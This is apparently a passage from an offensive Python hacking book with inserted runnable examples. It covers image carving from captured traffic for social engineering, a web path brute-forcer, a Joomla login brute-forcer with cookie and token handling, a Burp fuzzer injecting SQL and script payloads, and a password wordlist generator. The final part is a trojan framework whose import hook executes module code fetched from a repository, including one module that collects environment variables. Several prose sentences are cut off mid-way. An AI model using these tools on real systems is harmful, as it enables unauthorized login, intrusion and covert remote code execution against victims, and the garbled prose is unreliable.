You can of course do things such as force the target computer to proxy all of its traffic through a local instance of Burp, or do any number of other nasty things.
Some great use cases are generating fuzzing test cases based on captured network traffic, or even something as simple as replaying traffic that you have previously captured.
With these image files in hand, we will use OpenCV, a computer vision tool, to attempt to detect images that contain human faces so that we can narrow down the images that might be interesting. We can use our previous ARP poisoning script to generate the PCAP files, or you could extend the ARP poisoning sniffer to do on-the-fly facial detection on images while the target is browsing.
To start, we open the PCAP file for processing. We take advantage of a beautiful feature of Scapy, its sessions() method, to automatically separate the capture into its TCP sessions, keyed in a dictionary. After we validate that we are receiving an image back in an HTTP response, we extract the raw image and return the image type and the binary body of the image itself.
If we detect that the Content-Type header does indeed contain an image MIME type, we split out the type of image; and if compression (gzip, for example) was applied to the image in transit, we attempt to decompress it before returning the image type and the raw image buffer.
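The header check and decompression step described above, as an added example that is not the book's own code: it parses one reassembled HTTP response, accepts only image/* content types, strips any gzip or deflate transfer encoding, and treats a truncated compressed body as "no image" rather than crashing the carver. The responses it runs on are constructed in build_response (there is no PCAP here); the function names are mine.

```python
import gzip
import zlib


def build_response(content_type, body, encoding=None):
    """Assemble a constructed HTTP/1.1 response for testing (not captured
    traffic). Compresses the body when an encoding is requested."""
    if encoding == "gzip":
        body = gzip.compress(body)
    elif encoding == "deflate":
        body = zlib.compress(body)
    header_lines = [b"HTTP/1.1 200 OK", b"Content-Type: " + content_type]
    if encoding:
        header_lines.append(b"Content-Encoding: " + encoding.encode("ascii"))
    header_lines.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join(header_lines) + b"\r\n\r\n" + body


def get_http_headers(http_payload):
    """Return the response headers as a dict with lowercase names, or None
    when the payload is not the start of an HTTP response."""
    if b"\r\n\r\n" not in http_payload:
        return None
    head = http_payload.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    if not lines[0].startswith(b"HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower().decode("ascii", "replace")] = (
            value.strip().decode("latin-1"))
    return headers


def extract_image(http_payload):
    """Return (image_type, image_bytes) when the response carries an image,
    otherwise None. Handles gzip and deflate Content-Encoding."""
    headers = get_http_headers(http_payload)
    if headers is None:
        return None
    content_type = headers.get("content-type", "")
    if not content_type.lower().startswith("image/"):
        return None
    # "image/jpeg; charset=binary" -> "jpeg"
    image_type = content_type.split("/", 1)[1].split(";", 1)[0].strip().lower()
    body = http_payload.split(b"\r\n\r\n", 1)[1]
    length = headers.get("content-length", "")
    if length.isdigit():
        body = body[:int(length)]        # ignore anything after this response
    encoding = headers.get("content-encoding", "").lower()
    try:
        if encoding == "gzip":
            body = gzip.decompress(body)
        elif encoding == "deflate":
            body = zlib.decompress(body)
    except (OSError, EOFError, zlib.error):
        return None                       # truncated or corrupt compressed body
    return image_type, body
```

In the carver, each value of the sessions() dictionary is reassembled into one byte string and handed to extract_image; the returned bytes are what gets written to the faces directory for OpenCV to read.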
Using the OpenCV Python bindings, we can read in the image and then apply a classifier that has been trained in advance to detect faces in a front-facing orientation. There are classifiers for profile (sideways) faces, hands, fruit, and a whole host of other objects that you can try out for yourself. After the detection has been run, it returns rectangle coordinates that correspond to where each face was detected in the image.
We then draw a green rectangle over that area and write out the resulting image. If you open your faces directory, you should see a number of files with faces and green boxes drawn around them. This technique can be used to determine what types of content your target is looking at, as well as to discover likely approaches for social engineering. You can of course extend this example beyond carved images from PCAPs and use it in conjunction with the web crawling and parsing techniques described in later chapters.
In most modern networks, web applications present the largest attack surface and so are also the most common avenue for gaining access. There are a number of excellent web application tools that have been written in Python, including w3af, sqlmap, and others. The idea is to create a few different tools to give you the fundamental skills you need to build any type of web application assessment tool that your particular attack scenario calls for.
Be mindful that we are just fetching the raw page from the No Starch website, and that no JavaScript or other client-side code will execute. We simply pass a URL to the urlopen function and it returns a file-like object that allows us to read back the body of what the remote web server returns. In most cases, however, you are going to want more finely grained control over how you make these requests, including being able to define specific headers, handle cookies, and create POST requests.
To create custom headers, you define a headers dictionary, which allows you to set the header keys and values that you want to use. We then create our Request object, passing in the url and the headers dictionary, and then pass the Request object to the urlopen function call. This returns a normal file-like object that we can use to read the data from the remote website. All systems have their own challenges in terms of installation, configuration, and patch management, and these CMS suites are no exception.
Because we can download any open source web application and locally determine its file and directory structure, we can create a purpose-built scanner that hunts for all of those files that are reachable on the remote target. This can root out leftover installation files, directories that should be protected by. This project also introduces you to Python Queue objects, which allow us to build a large, thread-safe stack of items and have multiple threads pick items off it for processing.
This allows our scanner to run very rapidly. We walk the local install directory with os.walk and push every file path onto a Queue. We also create a simple list of file extensions that we are not interested in fingerprinting. This list can differ depending on the target application. We then use the os. If the file is not found or is protected by an.
Kicking the Tires
For testing purposes, I installed Joomla 3.
Brute-Forcing Directories and File Locations
The previous example assumed a lot of knowledge about your target.
However, in a lot of cases there are configuration files, leftover development files, debugging scripts, and other security breadcrumbs that can provide sensitive information or expose functionality that the software developer did not intend. The only way to discover this content is to use a brute-forcing tool to hunt down common filenames and directories. We read in a wordlist file and then begin iterating over each line in the file. We have some built-in functionality that allows us to resume a brute-forcing session if our network connectivity is interrupted or the target site goes down.
This is achieved by simply setting the resume variable to the last path that the brute forcer tried. When the entire file has been parsed, we return a Queue full of words to use in our actual brute-forcing function. We will reuse this function later in this chapter. The first is the ability to apply a list of extensions to test for when making requests.
The exception handler inspects the code attribute of any URLError that comes back, rather than silently discarding every error. If a list of file extensions is passed in, we take the current word and apply each file extension that we want to test for. After we build the list of brute-forcing attempts, we set the User-Agent header to something innocuous and test the remote web server.
We get our list of words to brute-force, create a simple list of file extensions to test for, and then spin up a bunch of threads to do the brute-forcing. In this case, the URL that is referenced in the source code points to an intentionally buggy web application hosted by Acunetix. The cool thing is that it shows you how effective brute-forcing a web application can be.
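The queue-building half of both tools above, as an added example rather than the book's own code: one function walks a local copy of the application and queues the paths the remote server should expose (skipping static extensions), one reads a wordlist with the resume behaviour described, and one expands a single word into the directory, bare file and per-extension attempts. The sample install tree is constructed in a temp directory by make_demo_tree and is not a real Joomla checkout; the remote probing threads (urlopen on base_url plus each queued path) are left out so the block runs offline.

```python
import os
import queue
import tempfile


def make_demo_tree():
    """Create a constructed stand-in for a locally unpacked web app (a few
    empty files in a temp dir) and return its root. Not a real install."""
    root = tempfile.mkdtemp(prefix="webapp_")
    os.makedirs(os.path.join(root, "administrator", "templates"))
    for rel in ("index.php", "configuration.php-dist", "README.txt",
                os.path.join("administrator", "index.php"),
                os.path.join("administrator", "templates", "logo.png"),
                os.path.join("administrator", "templates", "style.css")):
        with open(os.path.join(root, rel), "w") as handle:
            handle.write("")
    return root


def build_paths_from_tree(root, skip_exts=(".jpg", ".gif", ".png", ".css")):
    """Walk a local copy of the application and queue every file path as the
    remote server would expose it, skipping extensions we do not care about."""
    web_paths = queue.Queue()
    for r, d, f in os.walk(root):
        for name in f:
            if os.path.splitext(name)[1].lower() in skip_exts:
                continue
            rel = os.path.relpath(os.path.join(r, name), root)
            web_paths.put("/" + rel.replace(os.sep, "/"))
    return web_paths


def build_wordlist(lines, resume=None):
    """Queue every non-empty word. With resume set, skip everything up to and
    including that word so an interrupted run continues where it stopped."""
    words = queue.Queue()
    found_resume = resume is None
    for line in lines:
        word = line.strip()
        if not word:
            continue
        if not found_resume:
            if word == resume:
                found_resume = True
            continue
        words.put(word)
    return words


def expand_attempts(word, extensions=(".php", ".bak", ".orig", ".inc")):
    """Turn one wordlist entry into the request paths to try: a directory when
    the word has no extension, the bare file otherwise, plus each extension."""
    if "." not in word:
        attempts = ["/%s/" % word]
    else:
        attempts = ["/%s" % word]
    attempts.extend("/%s%s" % (word, ext) for ext in extensions)
    return attempts


def drain(q):
    """Collect a Queue into a list (for inspection and testing)."""
    items = []
    while not q.empty():
        items.append(q.get())
    return items
```

Worker threads would loop on words.get() until the queue is empty, request each expanded attempt, and report anything that does not come back as not-found; because Queue.get() is thread-safe, no further locking is needed.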
I cannot stress enough the importance of performing content brute-forcing against all of your web application targets. In order to brute-force Joomla, we have two requirements that need to be met: retrieve the login token from the login form before submitting the password attempt, and ensure that we accept cookies in our urllib2 session.
This will also be a good whirlwind tour of some additional features of urllib2 that you can employ when building tooling for your own targets. The next are all of the fields required in order for the form submission to be successful.
That randomized string is checked against your current user session, stored in a cookie, and even if you are passing the correct credentials into the login processing script, if the randomized token is not present, the authentication will fail. This means we have to use the following request flow in our brute forcer in order to be successful against Joomla:
1. Retrieve the login page, and accept all cookies that are returned.
2. Parse out all of the form elements from the HTML.
3. Test to see if we have successfully logged in to the web application.
You can see that we are going to be utilizing some new and valuable techniques in this script. After we grab our password attempt, we set up our cookie jar using the FileCookieJar class, which will store the cookies in the cookies file.
Next we initialize our urllib2 opener, passing in the initialized cookie jar, which tells urllib2 to hand any cookies off to it. We then make the initial request to retrieve the login form.
When we have the raw HTML, we pass it off to our HTML parser and call its feed method; the parser collects all of the retrieved form elements into a dictionary.
After we have successfully parsed the HTML, we replace the username and password fields with our brute-forcing attempt. After we retrieve the result of our authentication attempt, we test whether the authentication was successful or not. Once you have the basics of using the HTMLParser class, you can adapt it to extract information from any web application that you might be attacking. The first thing we do is create a dictionary in which our results will be stored.
After the HTML has been processed, our brute-forcing class can then replace the username and password fields while leaving the remainder of the fields intact. We simply pass in the username and our wordlist to our Bruter class and watch the magic happen.
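The complete request flow (custom headers, cookie jar, form parsing, token preservation, POST, success check), as an added example that is not the book's Bruter code, written for Python 3's urllib.request rather than urllib2. Because it has to run offline, it brings its own target: FakeJoomla is a constructed loopback stand-in for the administrator login that sets a session cookie, embeds a hypothetical per-session token as a hidden field, and only accepts a POST that returns the cookie, the token and admin/justin. The success marker text is an assumption, not something the page states.

```python
import threading
import urllib.parse
import urllib.request
from html.parser import HTMLParser
from http.cookiejar import CookieJar
from http.server import BaseHTTPRequestHandler, HTTPServer

TOKEN = "3f9a1c7e5b2d4a6f8e0c1b3d5f7a9c2e"   # hypothetical per-session token
SESSION_COOKIE = "sid=abc123"                  # constructed session cookie
SUCCESS_MARKER = "Control Panel"               # assumed post-login page text
FORM_HTML = """<html><body><form action="/administrator/index.php" method="post">
<input type="text" name="username" value="" />
<input type="password" name="passwd" value="" />
<input type="hidden" name="option" value="com_login" />
<input type="hidden" name="task" value="login" />
<input type="hidden" name="%s" value="1" />
</form></body></html>""" % TOKEN


class FakeJoomla(BaseHTTPRequestHandler):
    """Constructed stand-in for the login page; not the real application."""
    def log_message(self, *args):
        pass

    def _reply(self, body):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Set-Cookie", SESSION_COOKIE)
        self.end_headers()
        self.wfile.write(body.encode())

    def do_GET(self):
        self._reply(FORM_HTML)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = dict(urllib.parse.parse_qsl(self.rfile.read(length).decode()))
        ok = (self.headers.get("Cookie") == SESSION_COOKIE   # session must be presented
              and fields.get(TOKEN) == "1"                    # token must be echoed back
              and fields.get("username") == "admin"
              and fields.get("passwd") == "justin")
        self._reply("Administration - " + SUCCESS_MARKER if ok
                    else "Username and password do not match")


class FormParser(HTMLParser):
    """Collect every <input> name/value pair into a dictionary."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name"):
            self.fields[attrs["name"]] = attrs.get("value") or ""


def parse_form(html):
    parser = FormParser()
    parser.feed(html)
    return parser.fields


def attempt_login(base_url, username, password):
    """One guess: GET the form (accepting cookies), parse it, swap in the
    credentials, POST everything back, and look for the success marker."""
    jar = CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}  # innocuous UA
    url = base_url + "/administrator/index.php"
    html = opener.open(urllib.request.Request(url, headers=headers)).read().decode()
    fields = parse_form(html)
    if "username" not in fields or "passwd" not in fields:
        raise ValueError("login form fields not found")
    fields["username"] = username
    fields["passwd"] = password                  # token and the rest stay intact
    data = urllib.parse.urlencode(fields).encode()
    resp = opener.open(urllib.request.Request(url, data=data, headers=headers))
    return SUCCESS_MARKER in resp.read().decode()


def brute_force(base_url, username, wordlist):
    """Try each password; return the first that logs in, or None."""
    for password in wordlist:
        if attempt_login(base_url, username, password):
            return password
    return None


def start_fake_server():
    """Serve the stand-in on a loopback port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), FakeJoomla)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


if __name__ == "__main__":
    server, base_url = start_fake_server()
    print("found:", brute_force(base_url, "admin", ["password", "letmein", "justin"]))
    server.shutdown()
```

A fresh CookieJar per attempt mirrors what the book does with a cookies file: each guess starts a new session, so the token in the form and the cookie it is tied to always belong together. Against a real target the only changes are the base URL and the marker string you check for.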
My target VM is at I have already preset the username to admin and the password to justin in the Joomla installation so that I can make sure it works.
I then added justin to the cain wordlist. The tool prints each attempt (Trying: admin : <password>) along with the number of passwords left, and you can see that it successfully brute-forces and logs in to the Joomla administrator console. To verify, you of course would manually log in and make sure. Recent versions of Burp Suite include the ability to add your own tooling, called Extensions, to Burp. The first extension will enable us to utilize an intercepted HTTP request from Burp Proxy as a seed for creating a mutation fuzzer that can be run in Burp Intruder.
The second extension will interface with the Microsoft Bing API to show us all virtual hosts located on the same IP address as our target site, as well as any subdomains detected for the target domain.
I have to admit that when I first started exploring the Burp Extender API, it took me a few attempts to understand how it worked.
But I found a number of extensions on the Burp website that let me see how other folks had developed extensions, and I used that prior art to help me understand how to begin implementing my own code. As sad as it makes me to admit this, you will require a modern Java installation, which all operating systems either have packages or installers for.
Save the JAR file to an easy-to-remember location, such as your Desktop. Click the Extender tab, and then click the Options tab. You can leave the rest of the options alone, and we should be ready to start coding our first extension. Whether you are working with a binary protocol wrapped inside HTTP traffic or complex JSON requests, it is critical that you are able to test for traditional web application bugs.
I have also been guilty of running standard tools that are not designed to deal with strange protocols, or even JSON in a lot of cases. This is where it is useful to be able to leverage Burp to establish a solid baseline of HTTP traffic, including authentication cookies, while passing off the body of the request to a custom fuzzer that can then manipulate the payload in any way you choose. A common technique I use is to send requests to the Repeater tool, which lets me replay web traffic, as well as manually modify any interesting spots.
To perform more automated attacks in query parameters, you send a request to the Intruder tool, which attempts to automatically figure out which areas of the web traffic should be modified, and then allows you to use a variety of attacks to try to elicit error messages or tease out vulnerabilities. My first natural instinct is to take a look at the Burp API documentation to determine which Burp classes I need to extend in order to write my custom extension.
You can access this documentation by clicking the Extender tab and then the APIs tab. This can look a little daunting because it looks, and is, very Java-y. Next we see that Burp is expecting two functions to be present in our main class. The getGeneratorName function will be called by Burp to retrieve the name of our extension, and we are expected to return a string.
The createNewInstance function expects us to return an instance of IIntruderPayloadGenerator, which will be a second class that we have to create. We have to first import the IBurpExtender class, which is a requirement for every extension we write.
We follow this up by importing the classes we need for creating an Intruder payload generator. We then use the registerIntruderPayloadGeneratorFactory function to register our class so that the Intruder tool is aware that we can generate payloads. Next we implement the getGeneratorName function to simply return the name of our payload generator.
So we need to implement the base class, and it needs to expose three functions. The first function, hasMorePayloads, is simply there to decide whether to continue handing mutated requests back to Burp Intruder. The second, getNextPayload, receives the original payload bytes; if you have selected multiple payload areas in the HTTP request, you will only receive the bytes that you requested to be fuzzed (more on this later). This function allows us to fuzz the original test case and then return it so that Burp sends the new fuzzed value.
The last function, reset, is there so that if we generate a known set of fuzzed requests, say five of them, then for each payload position we have designated in the Intruder tab, we will iterate through the five fuzzed values.
Next we implement the hasMorePayloads function, which simply checks whether we have reached the maximum number of fuzzing iterations. You could modify this to run the extension indefinitely by always returning True. The getNextPayload function is the one that receives the original HTTP payload, and it is here that we will be fuzzing. Our last function is the reset function, which returns without doing anything.
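The three-method contract above, as an added plain-Python example that is not the book's Jython extension: Burp would call these through IIntruderPayloadGenerator, here they are ordinary methods so the mutation logic can be run and checked without Burp. The three mutations (inject a SQL fragment, inject a script tag, repeat a chunk of the payload) and the injected strings are my choices; the optional framer shows where a length field or checksum that a protocol demands would be added before the payload is returned.

```python
import random

SQLI = b"' OR 1=1 --"                      # chosen injection strings
XSS = b"<script>alert('x')</script>"


class Mutator:
    """Plain-Python counterpart of the IIntruderPayloadGenerator methods."""
    def __init__(self, seed, max_payloads=10, rng=None, framer=None):
        self.seed = bytes(seed)            # the payload bytes Burp hands us
        self.max_payloads = max_payloads
        self.num_iterations = 0
        self.rng = rng or random.Random()  # pass a seeded Random for repeatability
        self.framer = framer               # optional length/CRC wrapper

    def has_more_payloads(self):
        return self.num_iterations < self.max_payloads

    def get_next_payload(self, current_payload=None):
        base = bytes(current_payload) if current_payload is not None else self.seed
        payload = self.mutate(base)
        if self.framer is not None:
            payload = self.framer(payload)  # protocol framing goes here
        self.num_iterations += 1
        return payload

    def reset(self):
        self.num_iterations = 0

    def mutate(self, original):
        """Pick a random offset and apply one of three mutations."""
        payload = bytearray(original)
        if not payload:
            return bytes(SQLI)
        offset = self.rng.randrange(len(payload))
        picker = self.rng.randint(1, 3)
        if picker == 1:
            payload[offset:offset] = SQLI
        elif picker == 2:
            payload[offset:offset] = XSS
        else:
            chunk_len = self.rng.randint(1, len(payload) - offset)
            chunk = payload[offset:offset + chunk_len]
            payload[offset:offset] = chunk * self.rng.randint(1, 10)
        return bytes(payload)


def length_prefixed(payload):
    """Example framer: 2-byte big-endian length header in front of the payload."""
    return len(payload).to_bytes(2, "big") + payload


def demo_mutator(seed=b"id=1&user=bob", seed_value=1, max_payloads=3):
    """A Mutator with a fixed RNG seed so runs are reproducible."""
    return Mutator(seed, max_payloads, random.Random(seed_value))


if __name__ == "__main__":
    m = demo_mutator()
    while m.has_more_payloads():
        print(m.get_next_payload())
```

Burp drives the loop: it calls has_more_payloads, then get_next_payload with the bytes of the selected position, and sends the result; reset is called when it moves on to the next payload position.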
Because this function is aware of the current payload, if you have a tricky protocol that needs something special, like a CRC checksum at the beginning of the payload or a length field, you can do those calculations inside this function before returning, which makes it extremely flexible. We now have a Burp Intruder extension that we can use.
Kicking the Tires
First we have to get our extension loaded and make sure there are no errors. Click the Extender tab in Burp and then click the Add button.
A screen appears that will allow you to point Burp at the fuzzer. Ensure that you set the same options as shown in the figure. If all goes well, Burp should indicate that the extension was loaded successfully. If there are errors, click the Errors tab, debug any typos, and then click the Close button.
Your Extender screen should now look like the figure (Burp Extender showing that our extension is loaded). You can see that our extension is loaded and that Burp has identified that an Intruder payload generator is registered.
We are now ready to leverage our extension in a real attack. A screen appears that shows each query parameter highlighted.
This is Burp identifying the spots where we should be fuzzing. For clarity, see the figure that shows how payload highlighting works. Now click the Payloads tab. In this screen, click the Payload type drop-down and select Extension-generated. In the Payload Options section, click the Select generator button. Your Payload screen should now look like the figure. At the top of the Burp menu bar, click Intruder and then select Start Attack.
This starts sending fuzzed requests, and you will be able to quickly go through the results. When I ran the fuzzer, I received output as shown in the figure (our fuzzer running in an Intruder attack). As you can see from the warning on line 61 of the response, in request 5, we discovered what appears to be a SQL injection vulnerability. The important thing is to understand how we managed to get our custom extension in line with Intruder attacks. Of course, you want to discover these hostnames exposed on the same web server because they might give you an easier way to get a shell.
In order to stay out of trouble, we can use the Bing API to submit these queries programmatically and then parse the results ourselves. Make sure you have your Bing API key pasted in place; you are allowed a quota of free searches per month. We begin by defining our BurpExtender class, which implements the standard IBurpExtender interface and IContextMenuFactory, which allows us to provide a context menu when a user right-clicks a request in Burp.
We register our menu handler so that we can determine which site the user clicked, which then enables us to construct our Bing queries. We then query Bing for all virtual hosts that have the same IP address as the host contained within the HTTP request that was right-clicked. If a domain has been passed to our extension, then we also do a secondary search for any subdomains that Bing may have indexed. This is a great blend of using the Jython API and pure Python in a Burp extension to do additional recon work when attacking a particular target.
Kicking the Tires
Use the same procedure we used for our fuzzing extension to get the Bing search extension working. If the extension is loaded properly, you should see the menu option Send to Bing displayed as shown in the figure (our extension providing output from the Bing API search). And if you click the Target tab in Burp and then select Scope, you will see new items automatically added to our target scope as shown in the figure. The target scope limits activities such as attacks, spidering, and scans to only those hosts defined.
In other instances, strong passwords are not enforced. In these cases, an online password guessing session like the one in the last chapter might be just the ticket to gain access to the site.
The trick to online password guessing is getting the right wordlist. Of course, there are scripts in the Kali Linux distribution that crawl a website and generate a wordlist based on site content. Plus, those scripts usually have a ton of command-line arguments to remember. We start by importing the required modules. Once again, the goal is to create a context menu item in the Burp UI. Next we loop through each suffix and add it to the base word to create a unique password attempt. We do another loop with a capitalized version of the base word for good measure.
Then we mangle each base word and print the results. Time to take this baby for a spin.
Kicking the Tires
Click the Extender tab in Burp, click the Add button, and use the same procedure we used for our previous extensions to get the Wordlist extension working. Right-click the site in the Site Map pane and select Spider this host, as shown in the figure. You can now feed this list back into Burp Intruder to perform the actual password-guessing attack.
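The word extraction and mangling described above, as an added example that is not the book's extension: it takes the HTML Burp's spider would hand over, keeps visible text only (script and style bodies produce junk like variable names and CSS properties), pulls out candidate base words, and applies the suffix and capitalisation loops. The sample page is constructed, and the suffix list is an assumption since the page does not give the extension's own.

```python
import re
from html.parser import HTMLParser

# Constructed sample page, standing in for spidered site content.
SAMPLE_PAGE = """<html><head><title>Acme Widgets - Customer Portal</title>
<style>.hero { color: crimson; }</style></head>
<body><h1>Welcome to Acme Widgets</h1>
<p>Our Portland office supports the Widget customer portal 24/7.</p>
<script>var tracking = "ignored";</script></body></html>"""

# Assumed suffix list; the page does not state the extension's own.
SUFFIXES = ("", "1", "!", "2014", "2015", "!!")


class TextExtractor(HTMLParser):
    """Keep visible text only; drop the contents of script and style tags."""
    def __init__(self):
        super().__init__()
        self.chunks = []
        self.skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self.skip_depth:
            self.skip_depth -= 1

    def handle_data(self, data):
        if not self.skip_depth:
            self.chunks.append(data)


def extract_base_words(html, min_len=4):
    """Unique lowercase words of at least min_len characters that start with
    a letter, taken from the page's visible text."""
    parser = TextExtractor()
    parser.feed(html)
    pattern = r"[A-Za-z]\w{%d,}" % (min_len - 1)
    return {w.lower() for w in re.findall(pattern, " ".join(parser.chunks))}


def mangle(word, suffixes=SUFFIXES):
    """Append each suffix to the word, then to its capitalised form."""
    return [base + suffix
            for base in (word, word.capitalize())
            for suffix in suffixes]


def build_wordlist(html, suffixes=SUFFIXES, min_len=4):
    """Spidered page text in, candidate password list out."""
    wordlist = []
    for base in sorted(extract_base_words(html, min_len)):
        wordlist.extend(mangle(base, suffixes))
    return wordlist


if __name__ == "__main__":
    for candidate in build_wordlist(SAMPLE_PAGE):
        print(candidate)
```

In the Burp extension the same two functions run once per spidered response; the printed list is what you paste into Intruder as the password payload set.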
During a penetration test you will often come up against specific problems or automation needs, and the Burp Extender API provides an excellent interface to code your way out of a corner, or at least save you from having to continually copy and paste captured data from Burp to another tool. In this chapter, we showed you how to build an excellent reconnaissance tool to add to your Burp tool belt. As is, this extension only retrieves the top 20 results from Bing, so as homework you could work on making additional requests to ensure that you retrieve all of the results.
This will require doing a bit of reading about the Bing API and writing some code to handle the larger result set. You of course could then tell the Burp spider to crawl each of the new sites you discover and automatically hunt for vulnerabilities! You can install the GitHub client library from the command line by doing the following: pip install github3. I do my development from a Linux machine, but it works on any platform.
The config directory holds configuration files that will be uniquely identified for each trojan. As you deploy trojans, you want each one to perform different tasks, and each trojan will check out its unique configuration file.
The modules directory contains any modular code that you want the trojan to pick up and then execute. We will implement a special import hack to allow our trojan to import libraries directly from our GitHub repo. The data directory is where the trojan will check in any collected data, keystrokes, screenshots, and so forth. Open a new file in the modules directory, name it dirlister. Each module that you develop should expose a run function that takes a variable number of arguments.
This enables you to load each module the same way and leaves enough extensibility so that you can customize the configuration files to pass arguments to the module if you desire. This is exactly how you can continue to develop code in the future. I will leave the integration of more complex modules to you as a homework assignment.
Should you have a hundred deployed trojans, you can push new modules to your GitHub repo and QA them by enabling your new module in a configuration file for your local version of the trojan. This way, you can test on a VM or host hardware that you control before allowing one of your remote trojans to pick up the code and use it. This means that we need a way to tell it what actions to perform, and what modules are responsible for performing those actions.
Using a configuration file gives us that level of control, and it also enables us to effectively put a trojan to sleep by not giving it any tasks should we choose to. Each trojan that you deploy should have a unique identifier, both so that you can sort out the retrieved data and so that you can control which trojan performs certain tasks.
The JSON format makes it easy to change configuration options as well. Move into your config directory and create a file called abc. Drop into a command line and issue the following command from your main repo directory.
You provide a list of dictionaries that tell the trojan what modules to import and run. As you build up your framework, you can add additional functionality in these configuration options, including methods of exfiltration, as I show you in Chapter 9.
The first step is to build the necessary code to handle connecting, authenticating, and communicating with the GitHub API. This is just some simple setup code with the necessary imports, which should keep our overall trojan size relatively small when compiled.
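The configuration format, the run() module contract and the import hack, as an added example that is not the book's trojan code. The GitHub side is replaced by FAKE_REPO, a constructed path-to-contents dictionary, so the block runs offline; a real trojan would fill get_file_contents with an API read of the same paths. RepoImporter is a standard meta-path finder/loader (Python 3's importlib.abc interface), which is how "import dirlister" ends up executing source pulled from the repo rather than from disk. The environment module is an assumed second task, not one the page names.

```python
import importlib
import importlib.abc
import importlib.util
import json
import sys

# Constructed stand-in for the GitHub repo: path -> file contents.
FAKE_REPO = {
    "config/abc.json": json.dumps([
        {"module": "dirlister", "args": {"path": "."}},
        {"module": "environment"},
    ]),
    "modules/dirlister.py": (
        "import os\n"
        "def run(path='.', **kwargs):\n"
        "    return sorted(os.listdir(path))\n"
    ),
    "modules/environment.py": (
        "import os\n"
        "def run(**kwargs):\n"
        "    return dict(os.environ)\n"
    ),
}


def get_file_contents(repo, path):
    """Fetch one file from the repo (stand-in for a GitHub API read)."""
    return repo.get(path)


class RepoImporter(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    """The import hack: resolve `import <name>` against modules/<name>.py in
    the repo instead of the local filesystem."""
    def __init__(self, repo):
        self.repo = repo

    def find_spec(self, fullname, path=None, target=None):
        if get_file_contents(self.repo, "modules/%s.py" % fullname) is None:
            return None                     # not ours: normal importers handle it
        return importlib.util.spec_from_loader(fullname, self)

    def create_module(self, spec):
        return None                         # default module object is fine

    def exec_module(self, module):
        source = get_file_contents(self.repo, "modules/%s.py" % module.__name__)
        code = compile(source, "<repo modules/%s.py>" % module.__name__, "exec")
        exec(code, module.__dict__)         # run the fetched source as the module


def load_config(repo, trojan_id):
    """Read this trojan's task list from config/<id>.json."""
    raw = get_file_contents(repo, "config/%s.json" % trojan_id)
    if raw is None:
        return []                           # no tasks: the trojan sleeps
    return json.loads(raw)


def run_tasks(repo, trojan_id):
    """Import each configured module through the repo importer and call its
    run() with the configured args; returns {module_name: result}."""
    importer = RepoImporter(repo)
    sys.meta_path.insert(0, importer)       # repo modules win over local ones
    results = {}
    try:
        for task in load_config(repo, trojan_id):
            name = task["module"]
            module = importlib.import_module(name)
            results[name] = module.run(**task.get("args", {}))
    finally:
        sys.meta_path.remove(importer)
    return results


if __name__ == "__main__":
    for name, result in run_tasks(FAKE_REPO, "abc").items():
        print(name, "->", str(result)[:80])
```

Once a module has been imported it stays in sys.modules, so pushing a changed dirlister.py to the repo only takes effect on a trojan that has not loaded it yet (or one that deletes the entry before re-importing); the per-trojan config file is where you switch tasks on and off without touching the module code.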